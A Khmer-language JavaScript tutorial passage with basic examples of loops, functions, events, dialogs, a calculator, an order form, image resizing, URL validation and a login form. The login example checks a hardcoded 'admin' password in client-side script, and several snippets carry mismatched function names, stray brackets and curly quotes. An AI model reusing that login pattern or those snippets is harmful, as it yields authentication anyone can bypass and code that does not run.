  document.write("Outerloop: " + i + "<br />");
  for (var j = 0; j < 5; j++)
  {
   if (j == 3){
     continue outerloop;
   }
   document.write("Innerloop: " + j + "<br />");
  } 
}
document.write("Exiting the loop!<br /> ");
//-->
</script>
លទ្ធផលបង្ហាញ
Entering the loop!
Outerloop: 0
Innerloop: 0
Innerloop: 1
Innerloop: 2
Outerloop: 1
Innerloop: 0
Innerloop: 1
Innerloop: 2
Outerloop: 2
Innerloop: 0
Innerloop: 1
Innerloop: 2
Exiting the loop!

១២-  មេរៀន  JavaScript អនុគមន៍ Functions
និយមន័យ អនុគមន៍ Functions

<script type="text/javascript">
<!--
function functionname(parameter-list)
{
 statements
}
//-->
</script>

ឧទាហរណ៍

<script type="text/javascript">
<!--
function sayHello()
{
  alert("Hello there");
}
//-->
</script>

ហៅអនុគមន៍

<script type="text/javascript">
<!--
sayHello();
//-->
</script>

អនុគមន៍ Parameters:
ឧទាហរណ៍

<script type="text/javascript">
<!--
function sayHello(name, age)
{
  alert( name + " is " + age + " years old.");
}
//-->
</script>

The return Statement:
ឧទាហរណ៍

<script type="text/javascript">
<!--
function concatenate(first, last)
{
  var full;

  full = first + last;
  return full;
}
//-->
</script>

១៣-  មេរៀន  JavaScript Events
onclick Event Type:

ឧទាហរណ៍

<html>
<head>
<script type="text/javascript">
<!--
function sayHello() {
  alert("Hello World")
}
//-->
</script>
</head>
<body>
<input type="button" onclick="sayHello()" value="Say Hello" />
</body>
</html>

a

onsubmit event type:
ឧទាហរណ៍

<html>
<head>
<script type="text/javascript">
<!--
function validation() {
  all validation goes here
  .........
  return either true or false
}
//-->
</script>
</head>
<body>
<form method="POST" action="t.cgi" onsubmit="return validate()">
.......
<input type="submit" value="Submit" />
</form>
</body>
</html>

onmouseover and onmouseout:
ឧទាហរណ៍

<html>
<head>
<script type="text/javascript">
<!--
function over() {
  alert("Mouse Over");
}
function out() {
  alert("Mouse Out");
}
//-->
</script>
</head>
<body>
<div onmouseover="over()" onmouseout="out()">
<h2> This is inside the division </h2>
</div>
</body>
</html>

HTML 4 Standard Events

Event Value Description
onchange script Script runs when the element changes
onsubmit script Script runs when the form is submitted
onreset script Script runs when the form is reset
onselect script Script runs when the element is selected
onblur script Script runs when the element loses focus
onfocus script Script runs when the element gets focus
onkeydown script Script runs when key is pressed
onkeypress script Script runs when key is pressed and released
onkeyup script Script runs when key is released
onclick script Script runs when a mouse click
ondblclick script Script runs when a mouse double-click
onmousedown script Script runs when mouse button is pressed
onmousemove script Script runs when mouse pointer moves
onmouseout script Script runs when mouse pointer moves out of an element
onmouseover script Script runs when mouse pointer moves over an element
onmouseup script Script runs when mouse button is released

១៤-  មេរៀន  JavaScript – Dialog Boxes

Alert Dialog Box:

<head>
<script type="text/javascript">
<!--
  alert("Warning Message");
//-->
</script>
</head>

Confirmation Dialog Box:

<head>
<script type="text/javascript">
<!--
  var retVal = confirm("Do you want to continue ?");
  if( retVal == true ){
   alert("User wants to continue!");
	 return true;
  }else{
   alert("User does not want to continue!");
	 return false;
  }
//-->
</script>
</head>

Prompt Dialog Box:

<head>
<script type="text/javascript">
<!--
  var retVal = prompt("Enter your name : ", "your name here");
  alert("You have entered : " + retVal );
//-->
</script>
</head>

១៥-  មេរៀន JavaScript – Void Keyword

<head>
<script type="text/javascript">
<!--
void func()
javascript:void func()

or:

void(func())
javascript:void(func())
//-->
</script>
</head>

ឧទាហរណ៍១

<head>
<script type="text/javascript">
<!--
//-->
</script>
</head>
<body>
<a href="javascript:void(alert('Warning!!!'))">Click me!</a>
</body>

ឧទាហរណ៍២

<head>
<script type="text/javascript">
<!--
//-->
</script>
</head>
<body>
<a href="javascript:void(0))">Click me!</a>
</body>

ឧទាហរណ៍៣

<head>
<script type="text/javascript">
<!--
function getValue(){
  var a,b,c;

  a = void ( b = 5, c = 7 );
  document.write('a = ' + a + ' b = ' + b +' c = ' + c );
}
//-->
</script>
</head>

១៦-  មេរៀន Javascript – បង្កើតបូតុងបោះពុម្ពទំព័រ Page Printing

<head>
<script type="text/javascript">
<!--
//-->
</script>
</head>
<body>
<form>
<input type="button" value="Print" onclick="window.print()" />
</form>
</body>

IT ads

បង្កើតកម្មវិធីសម្រាប់ order ក្នុង Javascript

លោកអ្នកបង្កើត Form ចំនួនពីរ៖ ទី១ គឺ Form សម្រាប់បញ្ចូលតម្លៃ និងទី២ គឺ Form សម្រាប់ទាញតម្លៃមកបង្ហាញ សូមមើលគម្រូកូដដូចខាងក្រោម៖
<center>
<form name=”frm_inp”>
<table width=”500px” height=”350px”>
<tr>
<td colspan=”2″ align=”center”><h1>NANCO GROUP</h1></td>
</tr>
<tr>
<td align=”right”>ItemID :</td><td align=”left”><input type=”text” name=”id” /></td>
</tr>
<tr>
<td align=”right”>Type :</td><td align=”left”><select name=”type”>
<option>Beef</option>
<option>Crab</option>
<option>Sausage</option>
<option>Pork</option>
</td>
</tr>
<tr>
<td align=”right”>Size :</td><td align=”left”><select name=”size”>
<option>M</option>
<option>L</option>
<option>S</option>
</select>
</td>
</tr>
<tr>
<td align=”right”>Price :</td><td align=”left”><input type=”text” name=”price” /></td>
</tr>
<tr>
<td align=”right”>Discount :</td><td align=”left”><input type=”text” name=”dis” /></td>
</tr>
<tr>
<td align=”right”>Customer Name :</td><td align=”left”><input type=”text” name=”cn” /></td>
</tr>
<tr>
<td colspan=”2″ align=”center”><input type=”button” value=”Submit” onclick=”order()” style=”color:#F00″ /><input type=”reset” value=”Reset” style=”color:#F00″ /></td>
</tr>
</table>

</form>
</center>

<center>
<form name=”frm_ord”>

<table>
<tr>
<td>
<div id=”title”>Order</div>
</td>
</tr>
<tr>
<td align=”right”>Item :</td><td align=”left”><div id=”item”></div></td>
</tr>
<tr>
<td align=”right”>Type :</td><td align=”left”><div id=”tp”></div></td>
</tr>
<tr>
<td align=”right”>Size :</td><td align=”left”><div id=”sz”></div></td>
</tr>
<tr>
<td align=”right”>Total :</td><td align=”left”><div id=”total”></div></td>
</tr>
<tr>
<td align=”right”>Customer Name :</td><td align=”left”><div id=”cname”></div></td>
</tr>
</table>
</form>
</center>

a

បន្ទាប់ពីបង្កើតបានជា Form រួចមក បន្តបង្កើតជា Function ដើម្បីងាយសិក្សាលក្ខខណ្ឌ និងទាញយកតម្លៃមកបង្ហាញ។
<script type=”text/javascript”>
function order()
{
var f=document.frm_inp;
var i=document.id;
var p=document.price;
var d=document.dis;
var c=document.cn;
var t=document.type;
var s=document.size;
if(f.id.value==””)
{
alert(“Please input the item”);
f.id.focus();
}
else if(f.price.value==””)
{
alert(“Please input the price”);
f.price.focus();
}
else if(f.dis.value==””)
{
alert(“Please input the discount”);
f.dis.focus();
}
else if(f.cn.value==””)
{
alert(“Please input the customer name”);
f.cn.focus();
}
else
{
document.getElementById(“item”).innerHTML=f.id.value + “”;
document.getElementById(“tp”).innerHTML=f.type.value + “”;
document.getElementById(“sz”).innerHTML=f.size.value + “”;
document.getElementById(“cname”).innerHTML=f.cn.value + “”;
document.getElementById(“total”).innerHTML=f.price.value – (f.price.value*f.dis.value)/ 100 ;

}
}
</script>

​បង្កើតម៉ាស៊ីនគិតលេខ​ Javascript

aរបៀបបង្កើត ម៉ាស៊ីនគិតលេខ (Calculator) ដ៏សាមញ្ញមួយ ដោយ លោកអ្នកអាចធ្វើការគណនា នូវវិធីបូក ដក គុណ និង ចែក។ទៅអនុវត្តន៍បន្ថែមបានយ៉ាងងាយស្រួល។ម៉ាស៊ីនគិតលេខ នេះ ត្រូវបានបង្កើតឡើងដោយបង្កើតជា function សម្រាប់ ប្រមាណ វិធី នីមួយៗ ដូចជា៖ function add(), function sub(), function multiply(), និង function devide() ជាដើម។ ក្នុងនោះផងដែរ ការបង្កើត រូបរាងវិញ គឺយើងប្រើ ប្រាស់ HTML Form រួមជាមួយ Table ប្រើផ្គួបគ្នា។ តាមកូដខាងក្រោម៖

      <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<title>Sample Calculator</title>
<script type=”text/javascript”>
function add(){
var f=document.fn;
f.result.value = (f.var1.value)*1 + (f.var2.value)*1;
}
function minus(){
var f=document.fn;
f.result.value = f.var1.value – f.var2.value;
}
function multiply(){
var f=document.fn;
f.result.value = f.var1.value * f.var2.value;
}
function devide(){
var f=document.fn;
f.result.value = f.var1.value / f.var2.value;
}
</script>
</head>

<body>
<center>
<form name=”fn” style=”border:1px solid #666; width:300px; height:180px;”>
<table border=”0″>
<tr>
<td colspan=”2″ align=”center” style=”color:green; font-weight:bold; text-decoration:underline;”>IT CAMBO Calculator</td>
</tr>
<tr>
<td align=”right”>Input 1:</td><td align=”left”><input type=”text” name=”var1″ /></td>
</tr>
<tr>
<td align=”right”>Input 2:</td><td align=”left”><input type=”text” name=”var2″ /></td>
</tr>
<tr>
<td align=”right”> = :</td><td align=”left”><input type=”text” name=”result” disabled=”disabled” /></td>
</tr>
<tr>
<td colspan=”2″ align=”center”><input type=”radio” value=”Add” name=”opt” onclick=”add()” />Add<input type=”radio” value=”Sub” name=”opt” onclick=”minus()” />Sub<input type=”radio” name=”opt” value=”Multi” onclick=”multiply()” />Multi<input type=”radio” value=”Devide” name=”opt” onclick=”Devide()” />Devide</td>
</tr>
</table>
</form>
</center>
</body>
</html>

របៀប​បង្កើត Login Form ជាមួយ Javascript

aប្រើប្រាស់ Javascript ដោយបង្កើតជា Login Form សម្រាប់ផ្ទៀងផ្ទាត់ Username និង Password ជាដើម។
ជាដំបូងសូមលោកអ្នកបង្កើតជា Form មួយដោយប្រើប្រាស់ HTML ដូចជា៖
<form name=”fn”>
<table>
<tr>
<td colspan=”2″ align=”center”><h1>Login</h1></td>
</tr>
<tr>
<td align=”right”>Username:</td><td align=”left”><input type=”text” name=”username” /></td>
</tr>
<tr>
<td align=”right”>Password:</td><td align=”left”><input type=”password” name=”pass” /></td>
</tr>
<tr>
<td align=”center” colspan=”2″><input type=”button” name=”ok” value=”OK” onclick=”login()” /><input type=”reset” name=”reset” value=”Reset” /></td>
</tr>
</table>
</form>
បន្ទាប់ពីលោកអ្នកបានបង្កើតជា Form Login ហើយ សូមបន្តបន្ថែមកូដ Javascript ដើម្បីផ្ទៀងផ្ទាត់ Username និង Password វិញម្តង៖
<form name=”fn”>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<title>FormLoign</title>
<style type=”text/css”>
h1{
color:#00C;
font-weight:bold;
font-size:24px;
}
</style>
<script type=”text/javascript”>
function load()
{
var f=document.fn;
if(f.username.value==””)
{
alert(“Please input username”);
f.username.focus();
}
else if(f.pass.value==””)
{
alert(“Please input your password”);
f.pass.focus();
}
else if(f.username.value==”admin” && f.pass.value!=”admin”)
{
alert(“Your password is incorrect”);
}
else if(f.username.value!=”admin” && f.pass.value==”admin”)
{
alert(“Your username is incorrect”);
}
else if(f.username.value!=”admin” && f.pass.value!=”admin”)
{
alert(“Your username and password are incorrect”);
}
else
{
alert(“Your login”);
}

}
</script>
</head>
//block code for html form
</html>
សូមពិនិត្យមើលកូដពេញលេញនៅខាងក្រោម
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<title>FormLoign</title>
<style type=”text/css”>
h1{
color:#00C;
font-weight:bold;
font-size:24px;
}
</style>
<script type=”text/javascript”>
function load()
{
var f=document.fn;
if(f.username.value==””)
{
alert(“Please input username”);
f.username.focus();
}
else if(f.pass.value==””)
{
alert(“Please input your password”);
f.pass.focus();
}
else if(f.username.value==”admin” && f.pass.value!=”admin”)
{
alert(“Your password is incorrect”);
}
else if(f.username.value!=”admin” && f.pass.value==”admin”)
{
alert(“Your username is incorrect”);
}
else if(f.username.value!=”admin” && f.pass.value!=”admin”)
{
alert(“Your username and password are incorrect”);
}
else
{
alert(“Your login”);
}

}
</script>
</head>

<body bgcolor=”#CCCCCC”>
<html>
<center>
<form name=”fn”>
<table>
<tr>
<td colspan=”2″ align=”center”><h1>Login</h1></td>
</tr>
<tr>
<td align=”right”>Username:</td><td align=”left”><input type=”text” name=”username” /></td>
</tr>
<tr>
<td align=”right”>Password:</td><td align=”left”><input type=”password” name=”pass” /></td>
</tr>
<tr>
<td align=”center” colspan=”2″><input type=”button” name=”ok” value=”OK” onclick=”load()” /><input type=”reset” name=”reset” value=”Reset” /></td>
</tr>
</table>
</form>
</center>
</html>
</body>
</html>
បន្ទាប់ពីវាយកូដបានទាំងអស់នេះហើយ លោកអ្នកនឹងទទួលបាន Form Login ដូចខាងក្រោម
aaa

របៀប Resize រូបភាពជាមួយ Javascript

អត្ថបទ Javascript មួយចំនួនមុនបានបង្ហាញពីគន្លឹះនានា ដែលស្ថិតក្នុងគោលដៅ និងវិធីសាស្រ្តអនុវត្តន៍ផ្សេងៗគ្នា! អត្ថបទនេះ សំបុកអាយធីនៅតែបន្តបំពេញចិត្ត មិត្តអ្នកអាន និងជួយគាំទ្រសំបុកអាយធីបន្តទៅទៀត នោះគឺ របៀប Resize រូបភាពជាមួយ Javascript។ វិធីសាស្រ្តប្តូរទំហំរូបភាពនេះ គឺប្រើប្រាស់ Math Object ដើម្បីមកធ្វើការផ្លាស់ប្តូរ។ សូមពិនិត្យ និងអនុវត្តន៍ដូចខាងក្រោម៖
បង្ហាញកូដ

<script type=”text/javascript”>

function Resize()

{

var NewWidth = parseInt(prompt(“Enter new width:”, “”));

var NewHeight = Math.round(NewWidth * .667);

document.getElementById(“Pic”).style.width = NewWidth;

document.getElementById(“Pic”).style.height = NewHeight;

}

</script>

<img id=”Pic” src=”DSC00422.JPG” width=”225″ height=”150″/>

<input type=”button” value=”Resize” onclick=”Resize()”/>

 1. ការលោតប្រអប់ដើម្បីឲ្យអ្នកប្រើប្រាស់វាយលេខបញ្ចូលនោះគឺយើងប្រើ prompt box ដែលយើងអាច OK និង Cancel បាន (ឯ alert មានតែ OK ទេ)។
 2. ការប្រើប្រាស់ method parseInt() ចាប់យកតម្លៃដែលគេបញ្ចូលនោះ ដើម្បីបញ្ជាក់ថា វាប្រាកដជាលេខចំនួនគត់ (integer number) ។
 3. ចំណែកឯ ប្រវែងបណ្តោយរូបភាព (width) ត្រូវគុណនឹង .667 (តាមរូបភាព) ដើម្បីឲ្យវាមានខ្នាតសមាមាត្រជាមួយនឹង កំពស់រូបភាព (height) កុំឲ្យខូចទ្រង់ទ្រាយរូប
 4. ហើយនឹង Method Math.round() គឺប្រើដើម្បីបម្លែងកំពស់រូបទៅជាចំនួនគត់ ។ តម្លៃប្រវែងបណ្តោយ និងកំពស់ ថ្មីនេះត្រូវបានកំណត់ចូលទៅក្នុង style properties នៃរូបភាពនោះ។

សុពលភាព URL ដោយប្រើ Javascript

ជួនកាលយើងត្រូវការដើម្បីពិនិត្យមើលថាតើ URL ដែលបានបញ្ចូលដោយអ្នកប្រើនៅក្នុងប្រអប់អត្ថបទមួយគឺត្រឹមត្រូវឬយ៉ាងណា។
aខាងក្រោមកូដគំរូនៃរបៀបធ្វើ

The script

Add between your <head>..</head> tags.

<script type="text/javascript">// <![CDATA[
function checkUrl()
{
var theUrl=document.getElementById('url').value;
if(theUrl.match(/^(http|ftp)\:\/\/\w+([\.\-]\w+)*\.\w{2,4}(\:\d+)*([\/\.\-\?\&\%\#]\w+)*\/?$/i) ||
theUrl.match(/^mailto\:\w+([\.\-]\w+)*\@\w+([\.\-]\w+)*\.\w{2,4}$/i))
{
alert("valid Url");
}
else
{
alert("Not valid Url");
document.getElementById('url').focus();
return false;
}
}
// ]]></script>

The form to check

<form name="url_validate">
Enter URL: <input type="text" id="url" name="url" size="50" value="http://" />
<input type="button" onClick="checkUrl();" value="Validate" />
</form>

Full code

<html>
<head>
<script type="text/javascript">// <![CDATA[
function checkUrl()
{
var theUrl=document.getElementById('url').value;
if(theUrl.match(/^(http|ftp)\:\/\/\w+([\.\-]\w+)*\.\w{2,4}(\:\d+)*([\/\.\-\?\&\%\#]\w+)*\/?$/i) ||
theUrl.match(/^mailto\:\w+([\.\-]\w+)*\@\w+([\.\-]\w+)*\.\w{2,4}$/i))
{
alert("valid Url");
}
else
{
alert("Not valid Url");
document.getElementById('url').focus();
return false;
}
}
// ]]></script>
</head>
<body>
<form name="url_validate">
Enter URL: <input type="text" id="url" name="url" size="50" value="http://" />
<input type="button" onClick="checkUrl();" value="Validate" />
</form>
</body>
</html>

Break down of the script

var theUrl=document.getElementById('url').value;